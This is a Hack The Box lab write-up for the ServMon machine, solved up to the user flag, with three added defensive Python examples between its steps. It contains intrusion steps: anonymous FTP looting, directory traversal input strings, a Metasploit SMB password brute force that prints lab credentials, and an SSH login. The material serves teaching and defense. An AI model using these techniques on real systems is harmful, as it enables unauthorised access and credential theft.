Hack The Box - ServMon (Part 1)

Hello all, this is my first write-up on a Hack The Box machine. I solved it yesterday and found there are very few articles with an explanation, so I thought I should write about it.
Let's start with the scanning. Let's check which ports are open and what interesting information we get from the nmap command below.
nmap -T4 -A 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up (0.27s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1045/tcp filtered fpitp
1052/tcp filtered ddt
1100/tcp filtered mctp
1111/tcp filtered lmsocialserver
1175/tcp filtered dossier
1583/tcp filtered simbaexpress
5666/tcp open nrpe?
6699/tcp open napster?
7019/tcp filtered doceri-ctl
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| HTTP/1.1 404
| Content-Length: 28
| found: /staff_picks.html
| obuster/3.0.1
| HTTP/1.1 404
| Content-Length: 25
|_ found: /IEEE_802.html
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
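The scan output above is easier to triage once it is parsed into structure. The following Python script is an added example, not part of the original write-up: it parses nmap's normal output (the excerpt embedded in the script is taken from the scan above, trimmed to the lines the parser needs), attaches NSE script lines to the port they belong to, and flags the findings a defender would act on first, such as anonymous FTP being allowed and a certificate issued to localhost. The rule names and the PortResult type are this example's own, not nmap's.

```python
import re
from dataclasses import dataclass, field

# Sample input: an excerpt of the nmap output shown in the write-up above,
# trimmed to the lines this parser needs.
NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.184
Host is up (0.27s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
445/tcp open microsoft-ds?
1045/tcp filtered fpitp
8443/tcp open ssl/https-alt
| http-title: NSClient++
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
"""

# A port line looks like: "<port>/<proto> <state> <service> [<version...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class PortResult:
    port: int
    proto: str
    state: str
    service: str
    version: str = ""
    script_output: list = field(default_factory=list)


def parse_nmap(text):
    """Parse nmap 'normal' output into PortResult objects, attaching the NSE
    script lines ('|' / '|_' prefixed) to the port they follow."""
    results = []
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = PortResult(int(port), proto, state, service, version or "")
            results.append(current)
        elif line.startswith("|") and current is not None:
            # Drop the '| ' / '|_' prefix and keep the script text.
            current.script_output.append(line.lstrip("|_ ").strip())
    return results


# Findings a defender would triage first: (rule name, predicate on a PortResult).
# The names are this example's own.
RULES = [
    ("anonymous-ftp", lambda p: p.service == "ftp"
        and any("Anonymous FTP login allowed" in s for s in p.script_output)),
    ("smb-exposed", lambda p: p.port == 445),
    ("cert-for-localhost", lambda p:
        any("commonName=localhost" in s for s in p.script_output)),
    ("ssh-exposed", lambda p: p.service == "ssh"),
]


def triage(results):
    """Return {port: [rule names]} for every open port that matches a rule.
    Filtered and closed ports are skipped: nothing answered there."""
    findings = {}
    for p in results:
        if p.state != "open":
            continue
        hits = [name for name, pred in RULES if pred(p)]
        if hits:
            findings[p.port] = hits
    return findings


if __name__ == "__main__":
    for port, hits in sorted(triage(parse_nmap(NMAP_OUTPUT)).items()):
        print(f"{port:>5}/tcp  {', '.join(hits)}")
```

Running the script against the embedded excerpt reports ports 21, 22, 445 and 8443; port 80 is open but matches no rule, and the filtered port 1045 is ignored. Feeding it a full `nmap -oN` file works the same way, since the parser only depends on the port-line and script-line shapes.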
FTP allows anonymous login and there is one directory named "Users". Let's see what is inside the Users directory by connecting to FTP.
username: anonymous, password: not required
root@kali:~# ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.33 secs (0.5150 kB/s)
Let's take a look at the contents of the Confidential.txt file.

From this note, we get a hint that the Passwords.txt file path is Users/Nathan/Desktop/Passwords.txt.
Is there anything interesting in the Nathan folder? Have a look.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:10PM 186 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"

Hmmm... This might be a hint for the next steps. For now, proceed with Confidential.txt.
Let's try directory traversal to get Passwords.txt. After doing some fuzzing on the path, I got the results. We can automate this method using the tvt_nvms_traversal module of Metasploit.
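The traversal above works because the server concatenates the requested path onto its document root without checking where the normalised result ends up. The Python below is an added example, not code from the write-up or from the NVMS-1000 product: it shows that naive join beside a hardened resolver that decodes once, treats backslashes as separators, refuses NUL bytes, and rejects any path that leaves the root. The root /srv/www is an assumed value for the demonstration, not the target's layout, and the function names are this example's own.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the demonstration; the real server's layout is
# not on the page and is not assumed here.
WEB_ROOT = "/srv/www"


def resolve_naively(requested):
    """The bug class: concatenate the request path onto the root and
    normalise. '..' segments are honoured, so the result can land anywhere
    on the filesystem."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, requested.lstrip("/")))


def resolve_safely(requested):
    """Return the absolute path to serve, or None if the request must be
    refused. Containment is checked on the normalised result, which is the
    only check that survives encoding and separator tricks."""
    # Decode percent-encoding exactly once. Decoding in a loop would turn
    # '..%252f' back into '../'; decoded once it stays a literal, harmless
    # file name that simply does not exist under the root.
    decoded = unquote(requested)
    # Windows servers accept '\' as a separator; treat it as one here so
    # '..\..\' cannot slip past a check that only knows about '/'.
    decoded = decoded.replace("\\", "/")
    # NUL bytes truncate paths in C-based servers; refuse them outright.
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    # The candidate must be the root itself or a descendant of it. The
    # trailing '/' matters: '/srv/www2' also starts with '/srv/www'.
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request paths: one legitimate, the rest typical traversal shapes.
    for req in ("Pages/login.htm", "../../etc/passwd", "..%2f..%2fetc/passwd",
                "..\\..\\Windows\\win.ini", "../www2/secret", "index.html%00.png"):
        print(f"{req!r:28} naive={resolve_naively(req)!r:24} safe={resolve_safely(req)!r}")
```

The check is deliberately placed after normalisation rather than on the raw string: a blocklist of the substring `..` is easy to get wrong (it also rejects legitimate names such as `notes..txt`) and misses separator variants, whereas asking whether the final absolute path is still under the root answers the only question that matters.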

So now what? I tried logging into the main page with these credentials but failed. Then where can we use these credentials to log in? Port 445 is open in the nmap results, so I tried brute-forcing port 445 using the smb_login module of Metasploit.
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf5 auxiliary(scanner/smb/smb_login) > ls
[*] exec: ls
20200619112534_default_10.10.10.184_nvms.traversal_676768.txt pass.txt
20200619113802_default_10.10.10.184_nvms.traversal_380409.txt users.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE pass.txt
PASS_FILE => pass.txt
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.184:445 - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nadine:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nadine:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nadine:B3WithM30r4ga1n5tMe',
[+] 10.10.10.184:445 - 10.10.10.184:445 - Success: '.\Nadine:L1k3B1gBut7s@W0rk'
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nathan:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nathan:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nathan:B3WithM30r4ga1n5tMe',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nathan:L1k3B1gBut7s@W0rk',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nathan:0nly7h3y0unGWi11F0l10w',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nathan:IfH3s4b0Utg0t0H1sH0me',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\Nathan:Gr4etN3w5w17hMySk1Pa5',
[*] 10.10.10.184:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
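From the defender's side, the smb_login run above leaves a distinctive trail on the target: a burst of failed logons from one source, spread across several accounts, with a success in the middle. The Python below is an added example, not part of the write-up: it runs that detection over constructed Windows Security log records (event 4625 failed logon and 4624 successful logon, reduced to the fields a detection needs). The IPs 203.0.113.7 and 192.0.2.10 are documentation addresses, not hosts from the lab, and the threshold and window values are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Windows Security log records reduced to
# "<timestamp> <EventID> <account> <source IP> <logon type>".
# 4625 = failed logon, 4624 = successful logon, logon type 3 = network (SMB).
# The first source mirrors the shape of the spray above: a few failures for
# one account, one success, then a run of failures for a second account.
SAMPLE_LOG = """\
2020-06-19T11:38:02 4625 Nadine 203.0.113.7 3
2020-06-19T11:38:02 4625 Nadine 203.0.113.7 3
2020-06-19T11:38:03 4625 Nadine 203.0.113.7 3
2020-06-19T11:38:03 4624 Nadine 203.0.113.7 3
2020-06-19T11:38:04 4625 Nathan 203.0.113.7 3
2020-06-19T11:38:04 4625 Nathan 203.0.113.7 3
2020-06-19T11:38:05 4625 Nathan 203.0.113.7 3
2020-06-19T11:38:05 4625 Nathan 203.0.113.7 3
2020-06-19T11:38:06 4625 Nathan 203.0.113.7 3
2020-06-19T11:38:06 4625 Nathan 203.0.113.7 3
2020-06-19T11:38:07 4625 Nathan 203.0.113.7 3
2020-06-19T09:15:00 4625 Nathan 192.0.2.10 2
2020-06-19T09:15:20 4624 Nathan 192.0.2.10 2
"""

FAILED_LOGON = "4625"
SUCCESS_LOGON = "4624"


def parse_records(text):
    """Parse the reduced log format into dicts, oldest record first."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, src_ip, logon_type = line.split()
        records.append({"ts": datetime.fromisoformat(ts), "event": event_id,
                        "account": account, "src": src_ip,
                        "logon_type": int(logon_type)})
    return sorted(records, key=lambda r: r["ts"])


def detect_bruteforce(records, threshold=5, window=timedelta(seconds=60)):
    """Raise one alert per source IP whose failed logons inside any `window`
    reach `threshold`. The alert lists the accounts tried and any account
    that logged on successfully from that source during or shortly after
    the burst, which is what turns a noisy spray into a compromised account."""
    by_src = defaultdict(list)
    for r in records:
        by_src[r["src"]].append(r)

    alerts = []
    for src, recs in by_src.items():
        failures = [r for r in recs if r["event"] == FAILED_LOGON]
        for i in range(len(failures)):
            # Grow the window from failure i until the time gap exceeds it.
            j = i
            while j < len(failures) and failures[j]["ts"] - failures[i]["ts"] <= window:
                j += 1
            if j - i < threshold:
                continue
            start, end = failures[i]["ts"], failures[j - 1]["ts"]
            accounts = sorted({r["account"] for r in failures[i:j]})
            succeeded = sorted({r["account"] for r in recs
                                if r["event"] == SUCCESS_LOGON
                                and start <= r["ts"] <= end + window})
            alerts.append({"src": src, "start": start, "failures": j - i,
                           "accounts": accounts, "succeeded": succeeded})
            break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(parse_records(SAMPLE_LOG)):
        print(f"{a['src']}: {a['failures']} failures from {a['start']} "
              f"across {a['accounts']}, succeeded for {a['succeeded']}")
```

On the sample, the single user at 192.0.2.10 who mistyped once and then logged in produces no alert, while 203.0.113.7 is reported with ten failures across two accounts and a success for Nadine. The cross-account count is the useful signal: a lockout policy keyed on one account never trips on a spray that tries a short password list against many users.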
And finally we get a username and password to log in over SSH.
Nadine: L1k3B1gBut7s@W0rk
root@kali:~/Downloads# ssh Nadine@10.10.10.184
Nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine
08/04/2020 23:16 <DIR> .
08/04/2020 23:16 <DIR> ..
18/01/2020 11:23 <DIR> 3D Objects
18/01/2020 11:23 <DIR> Contacts
08/04/2020 22:28 <DIR> Desktop
08/04/2020 22:28 <DIR> Documents
18/01/2020 11:23 <DIR> Downloads
08/04/2020 22:27 <DIR> Favorites
08/04/2020 22:27 <DIR> Links
18/01/2020 11:23 <DIR> Music
18/01/2020 11:31 <DIR> OneDrive
18/01/2020 11:23 <DIR> Pictures
18/01/2020 11:23 <DIR> Saved Games
18/01/2020 11:23 <DIR> Searches
18/01/2020 11:23 <DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 27,836,751,872 bytes free
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine\Desktop
08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
20/06/2020 07:30 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 27,834,671,104 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
Voila! The flag is inside the user.txt file.
Sorry for the lengthy article. I just wanted to describe every step so that newbies can understand the reason for each step. Soon I will post the root flag.
If you like this article please let me know so that I will post more articles.